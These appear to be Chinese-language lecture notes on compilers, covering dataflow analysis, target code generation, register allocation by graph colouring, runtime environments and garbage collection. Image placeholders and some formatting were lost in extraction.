  • 方程组: $$ \begin{aligned} &\text{OUT[B]} = \bigcup_{\text{s是B的后继}} \text{IN[S]} \ &\text{IN}[B] = \text{OUT}[B] \cup \text{use}_B \end{aligned} $$

注意传递函数实际上是指令级一条套一条推得的:

$$ f_B(O) = f_{s_1}(f_{s_2}(f_{s_3}(O))) $$

所以如果你是直接根据块级别去做题的话,需要额外注意各条指令之间的依赖关系,判断到底是先用还是先定义。

比如说:

$$ \begin{aligned} &s_1: a = b * d \ &s_2: b = a - d \ \end{aligned} $$

这个基本块中,我们不仅定义了 $a$,还使用了 $a$,但是由于我们是先定义的,所以 $a$ 不在这个块最终输出的活跃变量中。

又比如:

$$ \begin{aligned} &s_1: a = a + 1 \ \end{aligned} $$

这个基本块中,我们也是既定义了 $a$,又使用了 $a$,但是仔细观察会发现我们是先使用的 $a$,再定义的 $a$,所以 $a$ 在这个块最终输出的活跃变量中。

后续分析同,不再赘述。

到达定值分析

到达定值(可达定义):在程序点 $p$ 处,变量 $v$ 的定值(即赋值语句,$v = \text{exp}$)可以到达 $p$

  • 分析模式:前向分析模式
  • 基础定义:
    • $\text{gen}_B$:基本块 $B$ 中生成定值的集合
    • $\text{kill}_B$:基本块 $B$ 中杀死定值的集合,即对于基本块中定值的 $v$,杀死所有其他对 $v$ 的定值
  • 分析域 $V$:变量集
  • 交汇运算 $\land$: $$ I_1 \land I_2 = I_1 \cup I_2 $$ 即:在任意前驱可达则认为是可达的。
  • 顶值 $T$:$\varnothing$
  • 传递函数 $f_B$:$f_B(I) = (I - \text{kill}_B) \cup \text{gen}_B$
  • 方程组: $$ \begin{aligned} &\text{IN}[B] = \bigwedge_{P \text{是} B \text{的前驱}} \text{OUT}[P] \ &\text{OUT}[B] = f_B(\text{IN}[B]) \end{aligned} $$

可用表达式分析

可用表达式:到达一个程序点的每条路径都对表达式 $E$ 求值,并且该表达式最近一次求值后其使用的变量没有被修改。

  • 分析模式:前向分析模式
  • 基础定义:
    • $\text{e_gen}_B$:基本块 $B$ 中生成的表达式的集合
    • $\text{e_kill}_B$:基本块 $B$ 中杀死的表达式的集合,若基本块中有语句 $s$ 对 $x$ 赋值,则杀死所有使用 $x$ 的表达式,如 $z = x + y$ 会杀死 $z + 1$,又如 $x = x + y$ 会杀死 $x + y$
  • 分析域 $V$:表达式集
  • 交汇运算 $\land$: $$ I_1 \land I_2 = I_1 \cap I_2 $$ 即:要求任意前驱中都要可用才认为可用
  • 顶值 $T$:全集
  • 传递函数 $f_B$:$f_B(I) = (I - \text{e_kill}_B) \cup \text{e_gen}_B$
  • 方程组: $$ \begin{aligned} &\text{IN}[B] = \bigwedge_{P \text{是} B \text{的前驱}} \text{OUT}[P] \ &\text{OUT}[B] = f_B(\text{IN}[B]) \end{aligned} $$

注意:

$$ \begin{aligned} &s_1: a = a + 1 \ \end{aligned} $$

这个基本块中,我们也是既计算了 $a + b$,又定值了 $a$,后来的定值杀死了前面的计算,所以 $\text{e_gen}_B$ 不包括 $a+1$,但是 $\text{e_kill}_B$ 包括 $a+1$(这样做能满足传递函数定义)。

总结

| 域 | 活跃变量 | 到达定值 | 可用表达式 | | -------- | ------------------------------------- | ------------------------------------- | ------------------------------------- | | 方向 | 后向 | 前向 | 前向 | | 传递函数 | $(O - \text{def}_B) \cup \text{use}_B$ | $(I - \text{kill}_B) \cup \text{gen}B$ | $(I - \text{e_kill}B) \cup \text{e_gen}B$ | | 边界条件 | $\text{IN}[\text{EXIT}] = \varnothing$ | $\text{OUT}[\text{ENTRY}] = \varnothing$ | $\text{OUT}[\text{ENTRY}] = \varnothing$ | | 交汇运算 | $\cup$ | $\cup$ | $\cap$ | | 方程组 | $\text{OUT}[B] = \bigcup{S, succ(B)} \text{IN}[S] \quad$ | $\text{IN}[B] = \bigcup{P, pred(B)} \text{OUT}[P] \quad$ | $\text{IN}[B] = \bigcap{P, pred(B)} \text{OUT}[P] \quad$ | | | $\text{IN}[B] = f_B(\text{OUT}[B])\quad$ | $\text{OUT}[B] = f_B(\text{IN}[B])\quad$ | $\text{OUT}[B] = f_B(\text{IN}[B])\quad$ | | 初始值 / 顶集 | $\text{IN}[B] = \varnothing$ | $\text{OUT}[B] = \varnothing$ | $\text{OUT}[B] = \text{全集}$ |

其中:

  • $B$ 表示基本块,$S$ 表示后继块,$P$ 表示前驱块
  • $\text{def}_B$ 表示在块 $B$ 中定义的变量集合
  • $\text{use}_B$ 表示在块 $B$ 中使用的变量集合
  • $\text{kill}_B$ 表示在块 $B$ 中被覆盖的定义集合
  • $\text{gen}_B$ 表示在块 $B$ 中生成的定义集合
  • $\text{e_kill}_B$ 表示在块 $B$ 中被覆盖的表达式集合
  • $\text{e_gen}_B$ 表示在块 $B$ 中生成的表达式集合

习题

31746

做数据流分析的结果:

63523

路径表达式

  • 有向图 $G = (V, E)$:其中 $V$ 是顶点集合,$E$ 是边的集合。
  • 路径表达式 (path expression):一个以 $E$ 为字母表的正则表达式 $R$,且 $R$ 识别的每个符号串都是图 $G$ 中的一条路径。

98139

基于路径表达式的数据流分析

  • 数据流分析的域 $V$,交汇运算 $\wedge : V \times V \to V$
  • 每个基本块 $B$ 的传递函数 $f_B : V \to V$
  • 用 $F(R) : V \to V$ 表示 $R$ 能识别的路径的数据流抽象

以前向分析为例

  • $F(\varepsilon)$ = 恒等函数
  • $F(e) = f_{h(e)}$,其中 $h(e)$ 是边 $e$ 的起点基本块
  • $F(R_1 \mid R_2) = F(R_1) \wedge F(R_2)$
  • $F(R_1 R_2) = F(R_2) \cdot F(R_1)$
  • $F(R_1^*) = \bigwedge_{i \geq 0} F(R_1)^i$,不过有时能找到更高效的算法

💾

目标代码生成

2025年1月7日 17:14

目标机模型

  • 类 RISC 计算机,按字节寻址,以 4 个字节为 1 个字(word)

  • 通用寄存器 $R_1, R_2, ⋯, R_n$

  • 使用如下机器指令,每条指令的长度为 8 字节:

    • $\text{LD} ; \text{dst}, \text{addr}$:把位置 $\text{addr}$ 上的值加载到位置 $\text{dst}$(load)

      $\text{LD} ; r_1, r_2$:寄存器到寄存器的拷贝

    • $\text{ST} ; x, r$:把寄存器 $r$ 中的值保存到位置 $x$(store)

    • $\text{OP} ; \text{dst}, \text{src}_1, \text{src}_2$:把位置 $\text{src}_1$ 和 $\text{src}_2$ 中的值运算后将结果放到位置 $\text{dst}$ 中(operation)

      $\text{OP}$ 是诸如 $\text{ADD}$ 或 $\text{SUB}$ 的运算符

    • $\text{BR} ; L$:控制流转向标号为 $L$ 的指令(branch)

    • $\text{Bcond} ; r, L$:对寄存器 $r$ 中的值进行测试,如果为真则转向标号 $L$(branch condition)

      $\text{cond}$ 是诸如 LTZ(判断是否小于 0)或 NEZ(判断是否不等于 0)的常见测试

目标机的寻址模式

  • contents(addr) 表示 addr 所代表的位置中的内容
  • lvalue(x) 表示分配给变量 x 的内存位置

| 位置形式 | 汇编表示 | 地址 | | -------------- | -------- | --------------------------- | | 变量名 | x | lvalue(x) | | 数组索引 | a(r) | lvalue(a) + contents(r) | | 直接常数 | #M | M | | 寄存器 | r | r | | 间接寄存器 | *r | contents(r) | | 索引 | M(r) | M + contents(r) | | 间接寄存器索引 | *M(r) | contents(M + contents(r)) |

target_machine_addressing_mode

进行栈式管理的目标代码

生成支持栈式存储管理的目标代码:

  • 生成过程调用和返回的目标代码序列
  • 将 IR 中的名字转换成为目标代码中的地址

简化调用 / 返回的三地址代码:

  • call callee
  • return

过程 callee (被调用者)的属性(编译时确定):

  • callee.codeArea:运行时代码区中 callee 的第一条指令的地址
  • callee.recordSizecallee 的一个活动记录的大小

过程的调用和返回

简化场景下的活动记录:

  • 只需考虑在活动记录中保存返回地址
  • 假设寄存器 SP 中维持一个指向栈顶的指针

调用指令序列

调用者

  • ST -4(SP), #here + 16:计算返回地址,当前指令地址加上 16(偏移掉 2 条指令,即当前 ST 和下一条 BR),地址是 4 字节的(32 位)
  • BR callee.codeArea:跳转到被调用者的代码

被调用者

  • SUB SP, SP, #callee.recordSize:为活动记录分配空间

返回指令序列

被调用者

  • ADD SP, SP, #callee.recordSize:释放活动记录
  • BR *-4(SP):跳转到返回地址

指令选择

控制流图

基础定义:

  1. 基本块(Basic Block):一个基本块是一段没有分支和跳转的连续代码。换句话说,它是一个入口和一个出口之间的代码段,只有在入口处进入,并且在出口处离开。

    具有线性结构,其中最后一条语句为跳转或者过程 / 函数返回 (br /jump/ret)。

  2. 控制流图(Control Flow Graph, CFG):控制流图是由基本块作为节点,控制流作为边构成的有向图。它展示了程序执行的所有可能路径。

    有向图,图中结点为基本块,边为控制流跳转。控制流只能从基本块的第一条指令进入。

示例代码:

n = 10; a = 1; b = 1;
while (!(n == 0)) {
    t = a + b; a = b; b = t;
    n = n - 1;
}
return a;

对应的控制流图:

62038

控制流图 + 三地址代码

三地址代码:控制流图的每个基本块内部为三地址代码。

  • 跳转指令的目标为基本块(而不是指令标号)。
  • 一种常见的 混合 IR
  • 上图 BB1 的指令并不完全是三地址形式,因为(BB2)和(BB3)都不是真实指令标号。

控制流图中的循环

循环的定义

  • 一个 结点集合 $L$
  • 存在一个 循环入口 (loop entry)结点,唯一的前驱可以在 $L$ 之外的结点
  • 每个结点都有到达入口结点的非空路径,且该路径都在 $L$ 中

30799

对应的控制流图中的循环:

  • 循环 1:${BB3}$
  • 循环 2:${BB6}$
  • 循环 3:${BB2, BB3, BB4}$(BB2 为入口结点)

划分基本块的算法

输入:三地址指令序列。

输出:基本块的列表。

方法:

  1. 确定 首指令 (leader,基本块的第一条指令):
    • 第一条三地址指令。
    • 任何一个条件或无条件跳转指令的 目标指令
    • 紧跟在一个条件或无条件跳转指令 之后的指令
  2. 确定基本块:每条首指令对应一个基本块:从首指令开始到下一个首指令。

21694

基于三地址跳转指令的流图:两个基本块 $B$ 和 $C$ 之间存在一条有向边当且仅当基本块 $C$ 的第一条指令可能在 $B$ 的最后一条指令之后执行。

  • 情况 1:$B$ 的结尾跳转到 $C$ 的开头。
  • 情况 2:$B$ 的结尾不是无条件跳转,且 $C$ 在原来的序列中紧跟 $B$ 之后。

可以额外添加 入口(entry)和出口(exit)结点,这些结点不包含指令。

64145

指令选择

主要问题:最大限度地利用寄存器,减少与内存交互的加载与保存。

代码生成算法的基本思想:

生成机器指令的规则

  • 只有当运算分量(参与计算的变量或常数)不在寄存器中,才从内存载入
  • 尽量保证只有当寄存器中的值不被使用时,才把它覆盖掉(延迟到最后一刻)

记录各个值对应的位置的数据结构:

  • 寄存器描述符(register descriptor)
    • 为每个寄存器维护,key 为寄存器名 $R_n$,value 为变量名
    • 跟踪哪些变量的当前值放在该寄存器内
  • 地址描述符(address descriptor)
    • 为每个程序变量维护,key 为变量名 $a,b,\cdots$,value 为变量名或寄存器名
    • 跟踪哪些位置(寄存器、栈中位置等)可以找到该变量的当前值

30399

三地址指令生成

代码语句

$x = y ; \text{op} ; z$

  1. 调用 $\text{getReg}(x = y ; \text{op} ; z)$,给 $x, y, z$ 选择寄存器 $R_x, R_y, R_z$。
  2. 查 $R_y$ 的寄存器描述符,如果 $y$ 不在 $R_y$ 中则生成指令 $\text{LD} ; R_y, y'$,其中 $y'$ 是某个存放了 $y$ 的值的内存位置。
  3. 对 $z$ 做与上述类似的处理。
  4. 生成指令 $\text{OP} ; R_x, R_y, R_z$,其中 $\text{OP}$ 对应 $\text{op}$(比如 $\text{ADD}$ 对应 +)。
  5. 更新寄存器和地址描述符。

$x = y$

  1. 调用 $\text{getReg}(x = y)$ 总是为 $x$ 和 $y$ 选择相同的寄存器。
  2. 如果 $y$ 不在 $R_y$ 中,那么生成指令 $\text{LD} ; R_y, y'$`,其中 $y'$ 是存放 $y$ 的位置。
  3. 更新寄存器和地址描述符。
    1. 如果生成了 $\text{LD}$ 指令,则先按照 $\text{LD}$ 的规则处理。
    2. $R_y$ 的寄存器描述符:把 $x$ 加入变量集合。
    3. $x$ 的地址描述符:只包含 $R_y$。

三地址指令

$\text{LD} ; R, x$

  1. $R$ 的寄存器描述符:只包含 $x$。
  2. $x$ 的地址描述符:$R$ 作为新位置加入 $x$ 的位置集合。
  3. 任何不同于 $x$ 的变量的地址描述符中删除 $R$。

$\text{OP} ; R_x, R_y, R_z$

  1. $R_x$ 的寄存器描述符:只包含 $x$。
  2. $x$ 的地址描述符:只包含 $R_x$。
  3. 任何不同于 $x$ 的变量的地址描述符中删除 $R_x$。

$\text{ST} ; x, R$

  1. 生成这种指令时 $R$ 一定存放了 $x$ 的当前值。
  2. $x$ 的地址描述符:把 $x$ 自己的内存位置加入位置集合。

三地址指令的活跃变量分析

活跃变量分析:基本块的结尾

  1. 如果变量 $x$ 在出口处活跃(其值在后续的控制流中会被用到),且查 $x$ 的地址描述符发现其不在自己的内存位置上,则生成指令 $\text{ST} ; x, R_x$。
  2. 更新寄存器和地址描述符。

如果不想维护这些描述符,可以在任何一条语句结束后都立即把值都写回内存位置

活跃变量分析

目的:研究哪些变量 “接下来马上会用到”。如果用不到,可以从寄存器里踢出。

活跃变量:如果对于两条语句 $i,j$,满足 $\text{def}(i, x)$ 且 $\text{use}(j, x)$,并且 $i\to j$ 存在一条路径没有其他的对变量 $x$ 的赋值,那么 $j$ 使用了 $i$ 处计算的 $x$,称为 $x$ 在语句 $i$ 处活跃,记作 $\text{live}_{out}(i, x)$。

  • 定值 $\text{def}(i, x)$:语句 $i$ 给变量 $x$ 进行了赋值
  • 使用 $\text{use}(i, x)$:语句 $i$ 使用了变量 $x$ 的值
  • 活跃变量 $\text{live}_{out}(i, x)$:变量 $x$ 在语句 $i$ 后的程序点上活跃(live)

活跃变量信息的用途:实现寄存器选择函数 $\text{getReg}()$。

  • 如果一个寄存器只存放了 $x$ 的值,且 $x$ 在 $i$ 处不活跃,那么这个寄存器在 $i$ 处可以用于其它目的。

分析算法

基本原则:设 $i$ 的下一条语句为 $j$:

  1. 若 $\text{use}(j, x)$,则 $\text{live}(i, x)$: 若在语句 $j$ 处使用了变量 $x$,则在语句 $i$ 处($i$ 是 $j$ 的前一个语句)$x$ 是活跃的。
  2. 若 $\text{live}(j, x)$ 且 $\neg \text{def}(j, x)$,则 $\text{live}(i, x)$: 若在语句 $j$ 处 $x$ 是活跃的,并且 $x$ 不是在语句 $j$ 处定义的,则在语句 $i$ 处 $x$ 也是活跃的。

活跃变量分析通常通过反向扫描程序的语句来进行,具体步骤如下:

  1. 初始化:假设在基本块出口处,所有非临时变量均活跃。

  2. 反向扫描

    • 从最后一个语句开始反向扫描基本块中的每个语句。
    • 对于形如 $x = y \ \text{op} \ z$ 的语句 $i$:
      • 将 $x, y, z$ 到目前为止更新过的活跃信息关联到 $i$。
      • 设置 $x$ 为 “不活跃”(因为它刚刚被定义)。
      • 设置 $y$ 和 $z$ 为 “活跃”(因为它们在这里用了)。

    注意:上述步骤中,设置 $x$ 为不活跃和设置 $y$、$z$ 为活跃的顺序(即后两步顺序)非常重要,因为 $x, y, z$ 可能会重复出现,如 $x=x+y$。

实际上为了跨基本块进行活跃变量分析,应当使用下节课的数据流分析去递归调用。

寄存器分配

getReg 函数

目标:减少 LD 和 ST 的指令数目。

任务:对一条指令 $x = y ; \text{op} ; z$ ,为运算分量 $y$ 和 $z$ 以及结果 $x$ 选择寄存器。

给运算分量选择寄存器:

  1. 如果已经在寄存器中,则选择该寄存器。
  2. 否则,如果有空闲寄存器,则选择一个空闲寄存器。
  3. 否则,设 $R$ 是一个候选寄存器,其存放了 $v$ 的值:
    • 如果 $v$ 的地址描述符包含其它位置,则可以用 $R$(还有别的地方存了,可以覆盖)。
    • 如果 $v$ 就是 $x$ 且不为运算分量,则可以用 $R$($x$ 是结果,本就要覆盖)。
    • 如果 $v$ 在该语句后不是活跃变量,则可以用 $R$($v$ 不会再用到,可以覆盖)。
  4. 否则,进行溢出操作(spill)。

溢出操作(spill)

设 $R$ 是候选寄存器,它存放了变量 $v$ 的值:

  1. 生成指令 $\text{ST} ; v, R$,并更新 $v$ 的地址描述符(把寄存器的值驱逐到内存中去)。
  2. 如果 $R$ 中还存放了别的变量的值,则可能要生成多条 ST 指令。
  3. 然后,我们就可以使用 $R$ 了。

寄存器的分配与指派

分配:哪些值应该放在寄存器中

指派:各个值应该存放在哪个寄存器

两个不同时活跃的变量可以使用同一个寄存器。

寄存器冲突图

构造寄存器冲突图(register-interference graph)

  • 结点:在第一趟代码生成中使用的符号寄存器
  • :两个符号寄存器不能指派同一个物理寄存器(相互冲突)则用边连起来

构造方法:

  1. 先假设寄存器无限,构造一次
  2. 然后写出汇编代码,列出每步的活跃寄存器
  3. 将同时活跃的寄存器连线,构造出图染色问题,进行图着色后,相同颜色的结点可以分配同一个物理寄存器
  4. 如果最小能进行 n - 染色,则 n 个寄存器即可
  5. 如果不能进行 n - 染色,则需要增加寄存器或者进行溢出操作

冲突:$R_1$ 在 $R_2$ 被定值的地方是活跃的,也就是说如果存在在一个指令 $i$,使得 $\text{def}(i, R_2)$ 且 $\text{live}_\text{out}(i, R_1)$,这个时候我们不能将他们合并为一个寄存器,因为这两个值后续都要用。

image-20250106223232324

62805

图着色算法的启发式技术

定理:如果冲突图中每个结点的度数都 $< m$,则总是可以 $m$- 着色。

原因:每个结点邻居的颜色最多 $m - 1$ 种,总能对其着色。

算法

  1. 寻找度数 $< m$ 的结点,从图中删除,并把该结点压到一个栈中
  2. 如果所有结点的度数都 $\geq m$:
    • 找到一个溢出结点,不对它着色
    • 删除该结点。
  3. 当图为空的时候:
    • 从栈顶依次弹出结点。
    • 选择该结点的邻居没有使用的颜色进行着色。

如果有溢出:

  1. 为溢出结点生成代码,使用时加载到新的符号寄存器中
  2. 然后对新的代码重新进行活跃性分析和寄存器分配(反正大不了退化到一用一存,肯定能搞定)

溢出节点选择:降低溢出代价,即降低引入的额外指令的运行时开销,尤其是避免在循环中引入新代码。

拆分

定义:对一个节点的 活跃范围 进行拆分,从而降低其在冲突图中的度数

  • 把某个结点对应寄存器的值保存到内存中(故意加一句 $\text{ST} ; x, R_1$)
  • 在拆分的地方把值再加载回来

16928

24486

52353

合并

定义:如果 $R_1$ 和 $R_2$ 在冲突图中不相邻的话,那么就可以把它们合并(coalesce)成一个符号寄存器

75926

  • 生成代码时,有大量的寄存器之间的拷贝,如 $\text{LD} ; R_1, R_2$
  • 如果把 $R_1$ 和 $R_2$ 分配到同一个物理寄存器,就不需要执行该拷贝

问题:可能增加冲突边的数目,从而无法着色

  • 解决方案 1:合并时不要创建高度数($\geq m$)的结点
  • 解决方案 2:如果 $a$ 的每个邻居 $r$ 都满足下面的条件之一,才可以把 $a$ 与 $b$ 合并:
    • $r$ 与 $b$ 之间有冲突
    • $r$ 的度数比较低($< m$)

预着色

  • 有些指令有默认寄存器,不可更改
  • 当成特殊符号寄存器,在着色前就加入图中并染色
  • 不要在这些节点溢出

💾

运行时环境

2025年1月7日 17:13

运行时环境的作用

运行时环境的主要作用是实现 存储组织过程抽象

问题:运行时环境需要考虑源语言本身的特性

可执行文件 = 源程序代表的计算 + 通过体系结构 / 操作系统接口实现的运行时环境

虚拟机实现的接口:

  • vm_get(name)
  • vm_set(name, value)
  • vm_param(value)
  • vm_call(name, nargs)
  • vm_ret(value)

其中,vm 是 Virtual Machine(虚拟机)的缩写,后缀是三地址代码的指令。

基础示例

72589

27093

其实就是 Lab 那个 Koopa IR 的作用,翻译成与具体运行环境无关的代码。

  • 体系结构和操作系统提供了非常底层的操作
  • 运行时环境用这些操作来实现数据存储和过程调用

主要要关注一下状态:

  • pc:程序计数器,指向当前执行的指令
  • ra:返回地址,return address
  • a0:返回值
  • st:参数栈,调用 vm_param 时,参数入栈

运行时环境的设计

存储组织:在代码生成前,编译器需要进行 目标运行环境的设计数据空间的分配

编译器在操作系统 / 虚拟机规定的区域中存储生成的目标代码与代码运行时的数据空间

比如 RISC-V 中:

  • .text 段存储代码
  • .data 段存储全局变量等

区分程序的编译时刻和运行时刻

  • 编译时刻:对应静态分配
    • 编译器通过程序文本即可做出分配决定
    • 例如:常量、全局变量、静态变量(C 中的 static 变量)
  • 运行时刻:对应动态分配
    • 程序在运行过程中才能做出分配决定
    • 例如:局部变量、动态变量(C 中的 malloc 函数分配的数据)

注意:静态确定的存储空间大小并 不意味 静态分配(可以动态分配,回顾 ICS,其中有个 .bss 段节省空间)

很多时候空间大小可以由类型信息得出

纯静态存储分配

定义:所有分配决定都在编译时得到。

  • 优点:不需要运行时的支持,可以做分时复用优化
  • 缺点:不支持递归调用过程(过程调用次数不能静态确定),不能动态建立数据结构

实例:Fortran 语言。

动态存储分配

  • 栈式存储管理:随着过程调用分配,值与过程的生命周期相同,局部栈上自动变量
  • 堆式存储管理:不完全随过程调用分配,值的生命周期可能比过程更长, malloc 完不 free

栈式存储管理

活动树:表示程序运行的所有过程

  • 一个节点:一个过程活动
  • 根节点:主过程/入口过程
  • 前序遍历:得到过程调用的顺序
  • 后序遍历:得到过程返回的顺序

活动记录

活动记录 / 栈帧:地址连续的一个存储块。

一次活动:子程序 / 过程 / 函数的一次执行。

结构:

  • 实际参数:通常放在寄存器里,但有时放不下
  • 返回值:通常放在寄存器里,但是不绝对
  • 控制链:指向调用者的活动记录
  • 访问链:用于定位别处(非本活动记录)的某个数据
  • 保存的机器状态:此次调用前的信息,如返回地址
  • 局部数据:该过程的局部变量
  • 临时变量:中间代码 / 目标代码生成产生的临时值

注意,这里与 Linux 栈帧不太一样,压栈的参数是被调用者活动记录的一部分,而不是调用者的。

布局:

53649

访问链与控制链

  • 访问链:指向过程中要访问的 非局部数据 所在的活动记录,用于查找符号 / 过程定义
  • 控制链:指向调用者的活动记录,用于找到当前活动的调用者,是活动树的一条有效路径

注意区分定义和调用

  • 访问链:管的是定义,是某变量 / 函数在源代码中出现的顺序 / 层级组织
  • 控制链:管的是调用,是活动的调用顺序

再重复一遍:

  • 沿访问链找定义
  • 沿控制链找上级活动(过程)

活动记录指针

11632

  • ARP 在活动记录开始位置的高地址下定长,存 固定长度 信息,类比 rbp
  • TOP 就是栈顶指针,可变长度,类比 rsp

恢复:

  • ARP:控制链存在 ARP,恢复的时候从这里找到调用者的指针,恢复 ARP。
  • TOP:以 ARP + 活动记录起始的固定长度赋值即可。

注意,这里 ARP 指针以上虽然属于被调用者栈帧,但是是由调用者创建的。

静态作用域

静态作用域:也称词法(lexical)作用域,非局部名字的绑定在过程被 定义时决定。典型实例如 PASCAL 语言。

访问链法

人话:沿着 访问链 找到定义所在位置

假设嵌套深度为 $m$ 的过程 $q$ 调用嵌套深度为 $n$ 的过程 $p$:

  • 情况 $m < n$:

    • $p$ 直接声明在 $q$ 中,也就是说 $m + 1 = n$
    • 将 $p$ 的访问链指向 $q$ 的活动记录
  • 情况 $m \ge n$:

    • $q$ 和 $p$ 的嵌套深度从 1 到 $n-1$ 的外围过程是相同的
    • 追踪 $q$ 的访问链 $m - n + 1$ 步,到达直接包含 $p$ 的过程 $r$ 的最近的活动记录
    • 将 $p$ 的访问链指向这个 $r$ 的活动记录

显示表法

人话:访问链法太慢了,还要挨个找链表,但是我们知道活动调用自然形成了一个递增的深度顺序,所以我们利用这个,做一个指针表。

显示表(display):运行时环境维护一个数组 $d$,为每个嵌套深度记录一个指针。

  • 指针 $d[i]$ 指向最近的嵌套深度为 $i$ 的活动记录
  • 如果过程 $p$ 在运行中访问嵌套深度为 $i$(静态可确定)的过程 $q$ 的数据,则可以通过 $d[i]$ 找到 $q$ 的活动记录
  • 使用显示表可以提高效率,访问开销是常数

50053

过程作为参数传递

当一个过程 $p$ 作为参数传递给另一个过程 $q$,并且 $q$ 随后调用了这个参数时,有可能 $q$ 并不知道 $p$ 的上下文。

方法:调用者把 $p$ 作为参数传递时,同时传递其访问链。

问题:栈式管理下,访问链指向的活动记录有可能不在栈中,如下例。

def M(x):
    def R(y):
        i, j, k = 0, 0, 0
        def P(z):
            return i + j + k + z
        return P
    f = R(1)
    return f(2)
print(M(3))

发生 return P 时,R 就从活动记录的栈中扔掉了,再以其结果 f 调用的时候,就找不到定义 P 的记录 R 了。

87697

解决办法:

  1. 完全在堆中分配和管理活动记录,从而延长生命周期
  2. 闭包
闭包

发生上述情况的 “逃逸” 时,运行时在堆上分配空间,存储需要的外层函数的局部数据。

92830

这样,在 R 没了的时候,调用 P 依旧能找到 R 的东西。

动态作用域

动态作用域:非局部名字的绑定在过程被 调用时决定

被调用者的非局部名字 a 和其调用者中使用 相同 的存储单元,此时静态无法确定,只能在运行时确定。

用得少,运行时环境为每个名字维护一个全局的作用域栈。

比较

19742

  • 动态作用域:
    • 调用 dynamic->small->show,在 show 里要找 r 的时候,沿着控制流往上找,在 small 里找到,输出 0.125
    • 若直接调用 dynamic->show,则在 dynamic 里找到,输出 0.250
  • 静态作用域:只要是调用 show,就沿着访问链往上找(这是静态的过程),所以无论在哪里调用 show,都输出 0.250

运行时环境实现

过程抽象主要需要考虑如何创建和维护活动记录,生成目标代码需要与操作系统和体系结构一致。

总体策略:

  • 调用代码序列:precall(预调用)和 prologue(序言)
  • 返回代码序列:epilogue(尾声)和 postreturn(后返回)

过程链接

  • 调用代码序列:分配空间,填写记录信息

    分为 precall 和 prologue

  • 返回代码序列:释放记录,恢复状态,继续执行

    分为 epilogue 和 postreturn

分割方案的权衡:

  • 调用者工作多:代码较长,因为每次调用都需要重复生成
  • 被调用者工作多:冗余存储操作,如考虑被调用者保存寄存器

调用代码序列设计

调用者 precall

  • 计算实际参数值,存入记录
  • 保存状态信息(caller-saved)
  • 更新 ARP 指针

被调用者 prologue

  • 保存状态信息(如 callee-saved 寄存器)
  • 初始化局部数据并执行

返回代码序列设计

被调用者 epilogue

  • 设置返回值
  • 恢复 ARP 和状态(callee-saved)
  • 转移到调用者代码

调用者 postreturn

  • 获取返回值
  • 恢复状态(caller-saved)

堆式存储管理

基本上就是 Malloclab 那一套,需要合理分配 / 回收堆区空间。

要注意的问题包括:

  • 内存泄漏
  • 悬空指针解引用

垃圾回收

类型不安全的语言(比如 C 和 C++)不适合使用垃圾回收

主要依赖于可达性分析。

可达性分析

根集(rootset):不需要指针解引用就可以直接访问的数据,如静态字段成员

可达性(reachability)

  • 根集中的成员指向的对象都是可达的
  • 对于任意一个对象,如果指向它的一个指针被保存在可达对象的某字段中,那么这个对象也是可达的

性质:一个对象一旦变得不可达,它就不会再变成可达的

改变可达对象集合的操作

  1. 对象分配:返回一个指向新存储块的指针。
  2. 参数传递 / 返回值:对象指针从实在参数传递到形式参数 / 从返回值传递给调用者。
  3. 引用赋值:对于指针 $u$ 和 $v$,赋值 $u = v$ 将 $u$ 指向 $v$ 指向的对象,可能使得 $u$ 原来指向的对象变得不可达,并递归使得更多对象不可达。
  4. 过程返回:活动记录出栈,局部变量从根集中移除,可能使得一些对象变得不可达。

垃圾回收算法

基本思想:寻找不可达的对象。

两种基本方法:

  1. 跟踪相关操作,捕获对象变得不可达的时刻,回收对象占用的空间。

    典型例子:基于引用计数的垃圾回收。

  2. 在需要时,标记出所有可达对象,然后回收其他对象。

    典型例子:基于跟踪的垃圾回收。

基于引用计数的垃圾回收器

每个对象有一个用于存放 引用计数 (reference counting)的字段,并按照如下方式维护:

  1. 对象分配:引用计数设为 1。
  2. 参数传递:引用计数加 1。
  3. 引用赋值:对于 $u = v$,$u$ 指向的对象引用计数减 1,$v$ 指向的对象引用计数加 1。
  4. 过程返回:每个局部变量指向对象的引用计数减 1。

2295

问题是会导致循环垃圾:

60853

循环垃圾的解决方法:弱引用,程序员手动声明一些指针不影响引用计数。

基于引用计数的垃圾回收器总结

优点:

  • 以增量方式完成,可以避免长时间停顿
  • 垃圾可以被及时回收
  • 易于实现
  • 可以与其它存储管理机制结合

缺点:

  • 空间代价:每个对象都要保存引用计数
  • 时间代价:每次指针更新都要做多次检查和修改
  • 循环数据结构会造成内存泄漏

标记 - 清扫式垃圾回收

以周期性的方式运行,在空闲空间耗尽或者低于某个阈值时启动,寻找不可达对象并回收其空间。

分成两个阶段:

  1. 标记:从根集开始,跟踪并标记出所有可达对象
  2. 清扫:遍历整个堆区,释放不可达对象

如果我们把数据对象看作顶点,指向关系看作有向边,那么标记的过程实际上是从根集开始的图遍历的过程

60418

算法优化

当前问题:基本算法需要扫描整个堆区

优化:用一个列表记录所有已经分配的对象不可达对象等于已分配对象去掉可达对象

  • 优点:只需要扫描这个列表就可以完成清扫
  • 缺点:需要维护这个额外的列表
标记 - 压缩式垃圾回收

对可达对象进行重定位(relocating)可以消除存储碎片

把可达对象移动到堆区的一端,另一端则是空闲空间空闲空间接合成单一块,更容易存储较大的对象提高应用程序的时间局部性和空间局部性

整个过程分成三个步骤:

  1. 标记:从根集开始,跟踪并标记出所有可达对象
  2. 计算新地址:计算可达对象的新地址
  3. 移动对象并更新其中的指针:移动可达对象并更新其中的指针

因为对象的位置发生改变,所以所有的指针都可能需要更新。

918

标记 - 清扫式垃圾回收小结

优点

  • 基本没有空间代价(一个内存块只需要若干个二进制位)
  • 可以正确处理循环数据结构

缺点

  • 应用程序必须全面停顿,不适用于实时系统
  • 可能会造成堆区的碎片化

改善措施

  • 可以采用 增量式回收部分回收 来改善
  • 可以用 标记并压缩 来解决

实际中可以同时使用 引用计数标记 - 清扫

拷贝回收器

标记并压缩的问题:压缩时需要扫描整个堆区

拷贝回收器:堆区空间被分为两个 半空间 (semispace)

  • From 半空间:在这里分配内存
  • To 半空间:拷贝可达对象到这里

策略:

  • 在 From 半空间里分配内存,当其填满后,开始垃圾回收
  • 回收时,把可达对象拷贝到 To 半空间
  • 回收完成后,把两个半空间的角色对换,应用程序继续

59230

世代垃圾回收器

设计原因:大多数对象生命周期都很短

策略:

  • 把堆区分成 不同的年龄区域 (代表不同的世代),对比较年轻的区域进行更加频繁的垃圾回收
  • 在一个回收周期内不用跟踪所有的内存单元
  • 周期性地对 “较老” 的区域进行回收

